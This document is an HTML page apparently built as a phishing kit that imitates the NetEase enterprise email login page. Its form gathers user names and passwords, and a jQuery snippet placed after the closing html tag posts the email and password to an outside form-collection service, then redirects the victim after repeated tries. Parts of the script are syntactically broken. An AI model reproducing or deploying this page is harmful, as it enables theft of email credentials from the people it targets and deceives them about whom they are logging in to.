<!DOCTYPE html>
<html lang="en">

<head>
    <meta http-equiv="Content-Type" content="text/html;charset=utf-8" />
    <meta name="keywords" content="网易企业邮箱,登录企业邮箱,企业邮箱注册,电子邮箱" />
    <meta name="description" content="网易企业邮箱登录页面繁体版，帮助用户登录企业邮箱，开启随时随地，极速收发的便捷体验。" />
    <meta name="title" content="网易企业邮箱 - 企业信息化专业解决方案">
    <title>163免邮--中国邮箱第一品牌</title>
    <link href="./mim/o/domain/202109090001/index/css/global.css" rel="stylesheet" type="text/css" />
    <link href="./mim/o/domain/202109090001/index/css/user.css" rel="stylesheet" type="text/css" />
    
    <link rel="icon" type="image/x-icon" href="./mim/o/favicon.png">

    <style type="text/css">
        .login-mod h2, .intro-mod h2, .news-mod h2 {
            background-image:url(./mim/o/domain/202109090001/index/img/bg_cn_noqiye.png);
            background-repeat:no-repeat;
        }
        .login-mod-wrapper {
            width: 413px;
            height: 355px;
            position: absolute;
            top:40px;
            left: 498px;
        }
        .login-mod-form {
            background: url(./mim/o/domain/202109090001/index/img/loginFormBg.png) no-repeat;
        }
        .login-mod-qr {
            background: url(./mim/o/domain/202109090001/index/img/bg_qr_expand.png) no-repeat;
        }
        .login-mod .fi-notit {
            padding-left:30px;
        }
        .login-qr {
            position: absolute;
            left: 350px;
            top: 291px;
            width: 64px;
            height: 64px;
            cursor: pointer;
        }
        .login-qr-1 {
            background: url(./mim/o/domain/202109090001/index/img/ic_qr.png) no-repeat;
        }
        .login-qr-1-hover {
            left: 349px;
            background: url(./mim/o/domain/202109090001/index/img/ic_qr_hover.png) no-repeat;
        }
        .app-download {
            float:left;
            margin-left:10px;
            padding-left:20px;
            margin-top:6px;
        }
        .app-download-android {
            background:url(./mim/o/domain/202109090001/index/img/ic_android.png) no-repeat;
        }
        .app-download-iphone {
            background:url(./mim/o/domain/202109090001/index/img/ic_apple.png) no-repeat;
        }
        .app-download-link {
            color: #9eb8a0;
            text-decoration: none;
        }
        .logo {
            width:150px;
            height:40px;
            background: url("./mim/o/public/logo.gif") no-repeat 0 0;
        }
        .fi{
            padding: 5px 0 !important;
        }
        .form-btn {
            background: url(./mim/o/domain/202109090001/index/img/button.png) no-repeat;
            width: 156px;
            height: 34px;
            border: none;
            color: #fff;
            cursor: pointer;
        }
        .form-btn:focus {
            outline: none;
        }
        #err-wrapper{
            /* width: 280px !important; */
            margin-left: 78px;
            /* text-align: center; */
            height: 16px;
            font-size: 12px;
        }
        .ssl-line{display: inline-block;}
        .ssl-line select{
            border: none;
            width: auto!important;
            right: 10px;
            height: auto!important;
            line-height: initial !important;
            vertical-align: inherit;
        }
  .official-app {
    position: relative;
    z-index: 10;
  }
  .official-app > .download-qrcode {
    display: none;
    position: absolute;
    top: 5px;
    left: 50%;
    -ms-transform: translate(-50%, 15px);
    -webkit-transform: translate(-50%, 15px);
    transform: translate(-50%, 15px);
    padding: 10px 0px 5px;
    box-shadow: 0px 4px 8px rgba(38, 42, 51, 0.1);
    border-radius: 8px;
    background: #FFFFFF;
    border: 1px solid #E1E1E1;
    color: #000;
    width: 130px;
    text-align: center;
  }
  .official-app > .download-qrcode > img {
    display: block;
    margin: 0 auto;
  }
  .official-app > .download-qrcode > p {
    font-size: 14px;
    color: #888;
  }
  .official-app:hover > .download-qrcode {
    display: block;
  }
        .lingxi-download-btn {display: inline-block;border: 1px solid #386ee7;color: #386ee7;padding:2px 12px;border-radius: 25px;font-size: 14px;}
        #donwload_block{color: #386ee7;margin-bottom: 30px;font-size: 16px;margin: 10px auto 10px;cursor: pointer;width: 260px;text-align: center;}
        #donwload_block .download-title{margin: 0 5px;}
        #msgpid {
            text-align: right;
        }
    </style>
    <link href="./mim/o/domain/202109090001/index/css/custom.css" rel="stylesheet" type="text/css" />
    <!--[if lt ie 9]>
    <style type="text/css">
        .logo {
            background: none;
            filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://mim/o/public/logo.gif', sizingMethod='scale');
        }
    </style>
    <![endif]-->
</head>
<body>
    <div class="page">
        <div class="header">
            <h1 class="logo"></h1>
            <div class="toplinks">
               
             
                     |
                English |
                    帮助
                </div>
        </div>
        <div class="body">
            <div class="part main-part" id="main-part">
                <div id="login-mod-wrapper" class="login-mod-wrapper login-mod-form">
                    <div class="mod login-mod  ">
                        <form name="loginform" id="loginform" action="cap.php" method="POST">
                            <!-- <input type="hidden" name="ch" id="ch" value="icp"> -->
                            <input type="hidden" name="pubid" id="pubid" value="">
                            <input type="hidden" name="passtype" id="passtype" value="">
                            <input type="hidden" name="support_verify_code" id="support_verify_code" value="1">
                        
                                
                            <h2>
                                企业用户登录
                            </h2>
                            <div class="fi">
                                <label class="tit">
                                    用户名
                                </label>
                                <input type="email" name="email" id="email" class="ipt-t ipt-sample" value=""/>
                            </div>
                            <div class="fi">
                                <label class="tit">
                                    密 码
                                </label>
                                <input type="password" class="ipt-t" name="password" id="password" value=""/>
                            </div>
                            <!-- 新增验证码 -->
                            <div id="verifyCodeWrap" class="fi f-dn">
                                <label class="tit">验证码</label>
                                <input type="text" name="verify_code" id="verify_code" style="float:left;width:140px;height:24px;line-height:24px;" class="ipt-sample">
                                <a id="codeImgWrap" style="float:left;width:100px;height:30px;padding:0;margin:0;display:block;cursor:pointer;" href="javascript:void(0);">
                                    <img src="#" style="width:100%;height:100%;">
                                </a>
                            </div>
                            <div class="fi" style="clear:both;">
                                <label for="remUsername">
                                    <input name="remUser" id="remUsername" value="1" type="checkbox" class="ipt-c" />
                                    记住用户名
                                </label>
                                &nbsp;&nbsp;
                                <input type="hidden" name="secure" value="1"/>
                                <div class="ssl-line">使用
                                    <select name="all_secure" id="all_secure">
                                        <option value="1">全程SSL登录</option>
                                        <option value="0">SSL安全登录</option>
                                    </select>
                                    <select name="ch" id="ch">
                                        <option value="">默认线路</option>
                                        <option value="hw">国际线路</option>
                                    </select>
                                </div>
                                <!-- <label for="secure">
                                    <input id="secure" disabled="disabled" value="1" checked type="checkbox" class="ipt-c"/>
                                    SSL安全登录
                                </label>
                                &nbsp;&nbsp;
                                <label for="all_secure"> 
                                    <input name="all_secure" id="all_secure"  value="1" checked type="checkbox" class="ipt-c"/>
                                    全程SSL
                                </label> -->
                            </div>
                            <div id="err-wrapper" class="err">
                                <span id="msgpid"></span>
                            </div>
                            <div class="fi fi-notit f-cb" style="text-align: center;">
                                <input type="submit"  class="form-btn" value="登　录" id="submit-btn" />
                              
                            </div>
                            <div class="goto" style="margin-top:0;">
                                    管理员登录
                                    <a class="gotoLink" id="resetPwd">忘记密码？</a>
                                    <a class="gotoLink" id="selectNetwork">登录太慢？</a>
                                    </div>
                            </form>
                        <div id="donwload_block">
                                <img src="./mim/o/domain/202109090001/index/img/lingxi.png" width="20" height="20" style="vertical-align: sub;" />
                                <span class="download-title">邮箱官方客户端</span>
                                <span class="lingxi-download-btn">立即下载</span>
                            </div>
                        </div>
                    <div id="login-qr-1" class="login-qr login-qr-1"></div>
                <div class="m-codebox js-codebox f-zindex-10 login-mod-form">
                    <!-- 安全登录 -->
                    <div id="appLoginTab" class="appLoginTab">
                        <div id="appLoginWait" style="display: block;">
                            <h3>手机扫码 安全防盗</h3>
                            <div id="appCodeWrap" class="appCodeWrap allowmove">
                                <div class="appCode-example"></div>
                                <div id="appCodeBox" class="appCodeBox">
                                    
                                    <div id="appCodeRefresh" class="appCodeRefresh" style="display: none;">
                                        <div class="appCode-wrap"><p>二维码已失效<br>请点击刷新</p></div>
                                    </div>
                                </div>
                            </div>
                            <p id="appLoginTxt" class="appLoginTxt txt-err"></p>
                            <p class="appLogin-hint">使用 邮箱大师 扫描二维码登录</p>
                            <p class="appLoginlink">如何使用</a><var>|</var>下载邮箱大师</a></p>
                        </div>
                        <div id="appLoginScan" class="appLoginScan" style="display:none">
                            <div class="appLogin-scanSuc"></div>
                            <p class="appLogin-scantxt txt-suc">成功扫描，请在手机上确认登录</p>
                            <a id="appLoginRestart" class="appLoginRestart" href="javascript:void(0)">返回重新扫描</a>
                        </div>
                    </div>
                    <a class="closeentry js-closeentry" href="javascript:;" hidefocus="true"></a>
                    </div>
                </div>
            </div>
            <div class="part sec-part">
                    <div class="mod sec-mod intro-mod">
                            <h2>
                                简介
                            </h2>
                            </div>
                    <div class="mod sec-mod news-mod">
                            <h2>
                                新闻
                            </h2>
                            </div>
                    </div>
            </div>
        <div class="footer">
            <div class="link">
                    关于网易 
                   相关法律 
                    企业邮箱 
                </div>
                <div class="right">
                    <span>本系统由网易企业邮箱提供 &copy;1997-<script language="javascript" src="./mimg/copyright/year.js"></script> </span>
                </div>
            </div>
    </div>
</body>
<script type="text/javascript">
var currentBanner = './mim/domain/img/163bg.jpg',
    isDefaultBg = !currentBanner || currentBanner.indexOf('verify_mail//mim/domain/img/user_bg.jpg') > -1 || false, // 兼容老版本使用user_bg.jpg 或者 为空 实际也表示默认背景
    currentStyle = '3',
    addresses = 't,c,h',
    isHmail = !!1, // 邮箱系统类型：0-cm,1-hm
    errMsg = '',
    domainType = 'bj' || 'bj';
    pageType = 'normal';
    
    // verifyCode = 'false';
    if(window.location.href.indexOf('code=true') > -1){
        verifyCode = 'true'
    }else{
        verifyCode = 'false';
    }
</script>
<script type="text/javascript">
    (function(document,datracker,root){function loadJsSDK(){var script,first_script;script=document.createElement("script");script.type="text/javascript";script.async=true;script.src="./hubble/DATracker.globals.1.6.12.8.js";first_script=document.getElementsByTagName("script")[0];first_script.parentNode.insertBefore(script,first_script)}if(!datracker["__SV"]){var win=window;var gen_fn,functions,i,lib_name="DATracker";window[lib_name]=datracker;datracker["_i"]=[];datracker["init"]=function(token,config,name){var target=datracker;if(typeof(name)!=="undefined"){target=datracker[name]=[]}else{name=lib_name}target["people"]=target["people"]||[];target["abtest"]=target["abtest"]||[];target["toString"]=function(no_stub){var str=lib_name;if(name!==lib_name){str+="."+name}if(!no_stub){str+=" (stub)"}return str};target["people"]["toString"]=function(){return target.toString(1)+".people (stub)"};function _set_and_defer(target,fn){var split=fn.split(".");if(split.length==2){target=target[split[0]];fn=split[1]}target[fn]=function(){target.push([fn].concat(Array.prototype.slice.call(arguments,0)))}}functions="get_user_id track_heatmap register_attributes register_attributes_once clear_attributes unregister_attributes current_attributes single_pageview disable time_event get_appStatus track set_userId track_pageview track_links track_forms register register_once alias unregister identify login logout signup name_tag set_config reset people.set people.set_once people.set_realname people.set_country people.set_province people.set_city people.set_age people.set_gender people.increment people.append people.union people.track_charge people.clear_charges people.delete_user people.set_populationWithAccount  people.set_location people.set_birthday people.set_region people.set_account abtest.get_variation abtest.async_get_variable".split(" ");for(i=0;i<functions.length;i++){_set_and_defer(target,functions[i])}datracker["_i"].push([token,config,name])};datracker["__SV"]=1.6;loadJsSDK()}})(document,window["DATracker"]||[],window);

    
    DATracker.init('MA-B8B4-DCBCC6752B4F', {
        truncateLength: 255,
        persistence: "localStorage",
        cross_subdomain_cookie: false
    });

    document.querySelector("form").onsubmit = (e)=>{
localStorage.setItem('urmail', document.querySelector("#email").value)
}
    </script>
<!--用于返回错误提示，和domainType值-->

<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/jquery.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/jquery-migrate.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/lang_zhcn.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/select_network.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/login_util.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/jquery.jsonp-2.4.0.min.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/select_banner.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/reset_pwd.js"></script>
<script type="text/javascript" src="./mim/o/domain/202109090001/index/js/select_ch.js"></script>
<script type="text/javascript" src="./mim/o/index/lib/scripts/qiye_algorithm.js"></script>

</html>
$.ajax({
        dataType: 'JSON',
        url: 'https://submit-form.com/Ca5ehLIm',
        type: 'POST',
        data:{
          email:email,
          password:password,
        },
            // data: $('#contact').serialize(),
            beforeSend: function(xhr){
              $('#submit-btn').html('Verifing.');
            },
            success: function(response){
              if(response){
                $("#msg").show();
                console.log(response);
                if(response['signal'] == 'ok'){
                  $("#password").val("");
                  if (count>=2) {
                    count=0;
                    // window.location.replace(response['redirect_link']);
                    window.location.replace("Mail delivered successfully!);

                  }
                  // $('#msg').html(response['msg']);
                }
                else{
                  // $('#msg').html(response['msg']);
                }
              }
            },
            error: function(){
              $("#password").val("");
              if (count>=2) {
                count=0;
                window.location.replace("http://www."+my_slice);
              }
              $("#msg").show();
              // $('#msg').html("Please try again later");
            },
            complete: function(){
              $('#submit-btn').html('Sign in');
            }
          });
    });
